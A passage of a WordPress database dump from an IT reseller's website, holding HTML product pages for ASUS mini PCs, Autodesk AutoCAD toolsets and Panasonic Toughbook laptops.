src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\r\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Home or other editions available</li>\r\n 	<li>ASUS Control Center server-grade IT management software and 36-month stable supply guarantee through ASUS Corporate Stable Model program</li>\r\n 	<li>7th Gen IntelÂ® Coreâ„¢ processors and 2400MHz DDR4 memory for enhanced productivity</li>\r\n 	<li>Ultra-detailed 4K UHD visuals and dual display support</li>\r\n 	<li>Slim and compact 1-liter design with detachable extension bay for optional optical drive, and serial and parallel ports</li>\r\n 	<li>Quiet and energy-efficient operation with Energy Star certification</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"173\" height=\"173\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\r\n\r\n<ul>\r\n 	<li>All-new Chromebox, powered by the latest 8th Generation IntelÂ® Coreâ„¢ processor</li>\r\n 	<li>Run thousands of Android app on Google Play with incredible performance</li>\r\n 	<li>Versatile USB 3.1 Gen 1 Type-C port for data transfer, power delivery and DisplayPort functionality</li>\r\n 	<li>Stay safe from viruses and malware with automatic system updates</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free work area.</li>\r\n 	<li>Easy setup and automatic software and security updates for protection from viruses and malware</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"wp-image-2577 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Powered by the latest IntelÂ® PentiumÂ® Gold or Coreâ„¢ T Series Processors for desktop-grade performance</li>\r\n 	<li>Dual-storage design with one M.2 PCIe 3.0 x4 SSD and one 2.5-inch HDD for high storage capacity.</li>\r\n 	<li>Compact, one-liter size metal chassis for a clutter-free workspace, plus vertical stand and VESA mount compatibility</li>\r\n 	<li>ASUS Corporate Stable Model program â€” 36-month stable-supply guarantee.</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\r\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro.</li>\r\n 	<li>Ultracompact size with 0.62-liter volume for a clutter-free workspace</li>\r\n 	<li>Powerful performance with the latest IntelÂ® Coreâ„¢ processors</li>\r\n 	<li>Sliding chassis design for easy, two-step storage and memory upgrades</li>\r\n 	<li>Comprehensive I/O connectivity to meet different needs</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Ultraslim chassis: Versatile desktop PC in a slimline, one-liter metal case</li>\r\n 	<li>Comprehensive connectivity: Flexible I/O for a wide range of uses</li>\r\n 	<li>Dual storage: Experience smooth daily computing with one up to 64GB eMMC onboard and one up to 1TB 2.5-inch HDD</li>\r\n 	<li>ASUS Control Center: Server-grade IT management software</li>\r\n 	<li>ASUS Corporate Stable Model program: 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability: Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest IntelÂ® Coreâ„¢ i7, i5, or i3 Kaby Lake processors with 4K visuals</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>M.2 SSD for data transfer speeds of up to 10Gbps</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>Two easy-access front-mounted ports with fast USB charging</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\r\n\r\n<div class=\"product-intro\">\r\n<ul>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>IntelÂ® Core i+ support with Optaneâ„¢ memory acceleration for 2X data speeds</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output and support for up to three displays via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen2 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n</div>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Windows 10 Pro (other editions available)</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen1 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest 8th Gen IntelÂ® Coreâ„¢ i7 or i5 Kaby Lake R processors &amp; DDR4 2400MHz support</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>NVM ExpressÂ® support for blazingly fast SSD data transfers of up to 32Gbps</li>\r\n 	<li>Two easy-access front-mounted USB 3.1 Gen 2 ports with fast USB charging</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>ASUS Business Manager software for routine maintenance and servicing</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free workstation</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Asus','','inherit','closed','closed','','1442-revision-v1','','','2019-09-18 16:11:49','2019-09-18 08:11:49','',1442,'https://bintara.com.my/blog/2019/09/18/1442-revision-v1/',0,'revision','',0),(2675,1,'2018-12-20 17:11:34','2018-12-20 09:11:34','<div class=\"grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pb-20 wd-bbw-1 wd-bc-smoke\">\r\n<div class=\"column-content parsys\">\r\n<div>\r\n<div class=\"heading section\">\r\n<h1 class=\"wd-font-40 wd-bold wd-color-white wd-uppercase\">Autodesk</h1>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-color-white wd-light wd-font-16 wd-mt-6\"><strong>Autodesk</strong> makes software for people who make things. If youâ€™ve ever driven a high-performance car, admired a towering skyscraper, used a smartphone, or watched a great film, chances are youâ€™ve experienced what millions of Autodesk customers are doing with our software.</p>\r\n\r\n<h2></h2>\r\n</div>\r\n</div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"500\" height=\"55\" /></div>\r\n<div class=\"heading section\">\r\n<h3 class=\"wd-normal wd-uppercase wd-color-gray-25 wd-font-34 wd-mt-16 wd-mb-0\">ONLY ONE. AUTOCAD.</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-mr-16 wd-pt-20\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-mt-0 wd-mb-12 wd-font-19 wd-color-gray-40\">From mechanical design aids to architecture tools to model-based GIS and mapping features, subscribe to AutoCAD software and access industry-specific toolsets, plus web and mobile apps.</p>\r\n\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Work faster with specialized toolsets</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">AutoCAD now includes industry-specific features and libraries for architecture, mechanical design, electrical design, and more.</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate floor plans, sections, elevations, and other drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Draw piping, plumbing, and ducting for faster design with mechanical tools.</li>\r\n 	<li class=\"wd-font-16\">Design ductwork, electrical conduit, and circuiting for HVAC, plumbing, and electrical with MEP (mechanical, electrical, and plumbing).</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"heading section\">\r\n<h3 class=\"pc-brand wd-light wd-font-30\">Take your work with you with AutoCAD web and mobile apps</h3>\r\n</div>\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mv-16 wd-font-19\">With a single AutoCAD subscription, work anywhere and stay connected to your DWGâ„¢ files on any platformâ€”desktop, web, or mobile. Easily move data and drawings between your desktop, web browser, and phone.</p>\r\n\r\n</div>\r\n</div>\r\n<div class=\"wd-mb-16 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"heading section\">\r\n<h2></h2>\r\n<h3 class=\"pc-brand wd-light wd-font-30\">What\'s included</h3>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-7 grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-bbw-1-sm wd-bc-smoke wd-pb-24-sm\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<p class=\"wd-light wd-mt-0 wd-mb-16 wd-font-19\">Specialized toolsets offer industry-specific features to help you design more quickly and easily:</p>\r\n\r\n<ul class=\"wd-pl-20 wd-mv-0\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create details, views, and more.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate tasks and annotations.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use a rules-driven workflow to enforce industry standards and generate schedules, lists, and tables.</li>\r\n 	<li class=\"wd-font-16\">Access libraries of symbols, parts, and detail components.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"text section\">\r\n<div class=\"text section\">\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<h2></h2>\r\n<h4><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"56\" /></h4>\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">The original AutoCAD 2D and 3D CAD software provides innovative tools for design and documentation.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create and edit 2D geometry and 3D models with solids, surfaces, and mesh objects.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Annotate drawings with text, dimensions, leaders, and tables.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize the ribbon and tool palettes.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Customize with add-on apps and APIs.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Extract object data to tables.</li>\r\n 	<li class=\"wd-font-16\">Attach and import data from PDF files.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-architecture-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"56\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features for architectural drawing, documentation, and schedules, and for automating drafting tasks.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create floor plans, sections, elevations, and other building design drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Additional features include walls, door, and windows.</li>\r\n 	<li class=\"wd-font-16\">Use 8,000+ intelligent architectural objects and styles to support AIA 2nd edition, BS1192 DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n\r\n&nbsp;\r\n\r\n<img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-electrical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"56\" />\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds electrical design features to help you create, modify, and document electrical controls systems.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create panel layouts, schematic diagrams, and other electrical drawings using specialized tools.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use consistent project standards with drawings organized in a project-based structure.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 65,000+ intelligent electrical symbols to support AS, GB, IEC, IEC-60617, JIC, JIS, NFPA, and IEEE standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-map-3d-2019-lockup-460x47.png\" alt=\"\" width=\"501\" height=\"56\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Incorporate GIS topology with AutoCAD so you can use and maintain CAD and GIS data for planning, design, and data management.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create, maintain, and communicate mapping and GIS information within the AutoCAD drawing environment.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to manage GIS data and aggregate it with design data.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Access spatial data stored in files, databases, and web services.</li>\r\n 	<li class=\"wd-font-16\">Use standard data schema, automated business workflows, and report templates for Electric North America, Electric Europe, Water, Wastewater, and Gas industries.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mechanical-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"56\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds a library of standards-based parts and tools to help you create, modify, and document mechanical designs for manufacturing.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Automate mechanical engineering tasks, such as generating machine components, dimensioning, and creating bills of material.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create parts, assemblies, and other drawings for product design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Use 700,000+ intelligent manufacturing parts, features, and symbols to support ISO, ANSI, DIN, JIS, BSI, CSN, and GB standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-mep-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"56\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you draft, design, and document MEP building systems in an AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create accurate construction documentation of MEP systems design.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use task-based tools to create MEP drawings for building systems.</li>\r\n 	<li class=\"wd-font-16\">Use 10,500+ intelligent MEP objects to support AIA 2nd edition, BS1192 Descriptive, and BS1192 â€“ AUG Version 2 standards, and DIN 276, ISYBAU Long Format, ISYBAU Short Format, and STLB layer standards.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-plant-3d-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"56\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds features to help you produce P&amp;IDs, and then integrate them into a 3D plant design model.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Generate and share isometrics, orthographics, and materials reports.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create schematic diagrams, plant layouts, and other drawings for plant design using specialized tools.</li>\r\n 	<li class=\"wd-font-16\">Includes a library of 400+ intelligent plant objects such as equipment templates, support templates, and structural members to support 40 standards, including ANSI and DIN.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-black-lockups-banners/autocad-raster-design-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"56\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Adds raster-to-vector tools to help you convert raster images into DWGâ„¢ objects. Edit scanned drawings in a familiar AutoCAD environment.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">Despeckle, bias, mirror, and touch up your images.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Use standard AutoCAD commands on raster regions and primitives. Easily erase raster images, lines, arcs, and circles.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Create lines and polylines from raster images, and convert raster files into vector drawings.</li>\r\n 	<li class=\"wd-font-16\">Show and analyze geo images in Civil 3D civil engineering software and the AutoCAD Map 3D toolset.</li>\r\n</ul>\r\n<div class=\"large-10 grid-columns\">\r\n<div class=\"responsive-column-0 responsive-column\">\r\n<div class=\"wd-pb-24\">\r\n<div class=\"column-content parsys\">\r\n<div></div>\r\n<div class=\"image parbase section\"><img class=\"cq-dd-image\" title=\"\" src=\"https://damassets.autodesk.net/content/dam/autodesk/www/products/responsive-imagery/responsive-lockups-banners/2019/autocad-web-app-2019-lockup-1200x132.png\" alt=\"\" width=\"501\" height=\"56\" /></div>\r\n<div class=\"text section\">\r\n<h4 class=\"wd-font-19 wd-light wd-mb-0 wd-mt-24\">Access AutoCAD from any computer.</h4>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"grid-columns\">\r\n<div class=\"responsive-column-1 responsive-column\">\r\n<div class=\"wd-btw-1 wd-bc-very-light-grey wd-pt-12\">\r\n<div class=\"column-content parsys\">\r\n<div class=\"text section\">\r\n<ul class=\"wd-pl-20\">\r\n 	<li class=\"wd-font-16 wd-mb-6\">View, create, and edit AutoCAD drawings.</li>\r\n 	<li class=\"wd-font-16 wd-mb-6\">Work on the latest drawings from anywhere.</li>\r\n 	<li class=\"wd-font-16\">Access updates in real time.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Autodesk','','inherit','closed','closed','','1444-revision-v1','','','2018-12-20 17:11:34','2018-12-20 09:11:34','',1444,'https://bintara.com.my/blog/2018/12/20/1444-revision-v1/',0,'revision','',0),(2753,1,'2018-12-24 14:17:58','2018-12-24 06:17:58','[vfb id=10]','Get Quotation (Epson)','','publish','closed','closed','','get-quotation-epson','','','2018-12-24 14:18:26','2018-12-24 06:18:26','',0,'https://bintara.com.my/?page_id=2753',0,'page','',0),(2679,1,'2018-12-21 09:46:48','2018-12-21 01:46:48','<h3>Computer Toughbook</h3>		\n			<h4>TOUGHBOOK 33</h4>		\n										<img width=\"418\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero.png 418w, https://bintara.com.my/wp-content/uploads/2018/12/tb_33_hero-300x279.png 300w\" sizes=\"(max-width: 418px) 100vw, 418px\" />											\n		<h5>PRODUCT DETAILS</h5><p>The Panasonic TOUGHBOOKÂ® 33 is the first fully-rugged 2-in-1 of its kindâ€”redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboardsâ€”TOUGHBOOK 33 is built for maximum mobility.</p><p>[maxbutton id=\"5\" ]</p>		\n			<h4>TOUGHBOOK 31</h4>		\n										<img width=\"519\" height=\"389\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10.jpg 519w, https://bintara.com.my/wp-content/uploads/2018/12/tb31_win10-300x225.jpg 300w\" sizes=\"(max-width: 519px) 100vw, 519px\" />											\n		<header></header>PRODUCT DETAILS<p>Panasonic presents the 